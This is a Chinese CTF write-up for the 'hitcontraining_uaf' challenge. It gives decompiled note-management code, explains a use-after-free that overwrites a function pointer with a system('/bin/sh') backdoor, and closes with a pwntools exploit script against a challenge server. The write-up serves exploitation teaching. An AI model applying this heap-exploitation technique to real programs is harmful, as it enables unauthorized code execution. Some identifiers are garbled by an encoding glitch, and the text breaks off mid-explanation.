hitcontraining_uaf

hitcontraining_uaf

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8047000)

32位，只开了NX

int magic()
{
  return system("/bin/sh");
}

这题算很简单，入门级uaf的题目

int add_note()
{
  int result; // eax
  int v1; // esi
  char buf[8]; // [esp+0h] [ebp-18h] BYREF
  size_t size; // [esp+8h] [ebp-10h]
  int i; // [esp+Ch] [ebp-Ch]

  result = count;
  if ( count > 5 )
    return puts("Full");
  for ( i = 0; i <= 4; ++i )
  {
    result = *((_DWORD *)¬elist + i);
    if ( !result )
    {
      *((_DWORD *)¬elist + i) = malloc(8u);
      if ( !*((_DWORD *)¬elist + i) )
      {
        puts("Alloca Error");
        exit(-1);
      }
      **((_DWORD **)¬elist + i) = print_note_content;
      printf("Note size :");
      read(0, buf, 8u);
      size = atoi(buf);
      v1 = *((_DWORD *)¬elist + i);
      *(_DWORD *)(v1 + 4) = malloc(size);
      if ( !*(_DWORD *)(*((_DWORD *)¬elist + i) + 4) )
      {
        puts("Alloca Error");
        exit(-1);
      }
      printf("Content :");
      read(0, *(void **)(*((_DWORD *)¬elist + i) + 4), size);
      puts("Success !");
      return ++count;
    }
  }
  return result;
}

add这里，先申请了一个chunk，用来放置打印的函数，和堆内容指针

另一个是自己可以申请的chunk

int del_note()
{
  int result; // eax
  char buf[4]; // [esp+8h] [ebp-10h] BYREF
  int v2; // [esp+Ch] [ebp-Ch]

  printf("Index :");
  read(0, buf, 4u);
  v2 = atoi(buf);
  if ( v2 < 0 || v2 >= count )
  {
    puts("Out of bound!");
    _exit(0);
  }
  result = *((_DWORD *)¬elist + v2);
  if ( result )
  {
    free(*(void **)(*((_DWORD *)¬elist + v2) + 4));
    free(*((void **)¬elist + v2));
    return puts("Success");
  }
  return result;
}

uaf 不解释了

int print_note()
{
  int result; // eax
  char buf[4]; // [esp+8h] [ebp-10h] BYREF
  int v2; // [esp+Ch] [ebp-Ch]

  printf("Index :");
  read(0, buf, 4u);
  v2 = atoi(buf);
  if ( v2 < 0 || v2 >= count )
  {
    puts("Out of bound!");
    _exit(0);
  }
  result = *((_DWORD *)¬elist + v2);
  if ( result )
    return (**((int (__cdecl ***)(_DWORD))¬elist + v2))(*((_DWORD *)¬elist + v2));
  return result;
}

show这里是调用程序给我申请的chunk里面的打印函数去打印的

思路

我们利用uaf，并且在fastbin里面链好chunk，就可以申请到程序上面的chunk，

然后修改打印函数为我们的后门函数，调用就能getshell了

from pwn import*
from Yapack import *
libc=ELF('libc-2.23_32.so')
r,elf=rec("node4.buuoj.cn",28063,"./pwn",0)
context(os='linux', arch='i386',log_level='debug')

add(0x8,b'aaaa')
add(0x18,b'aaaa')

dele(0)
dele(1)
#debug()
add(0x8,p32(0x8048945))
show(0)
ia()

bin上面链上的变成如下就可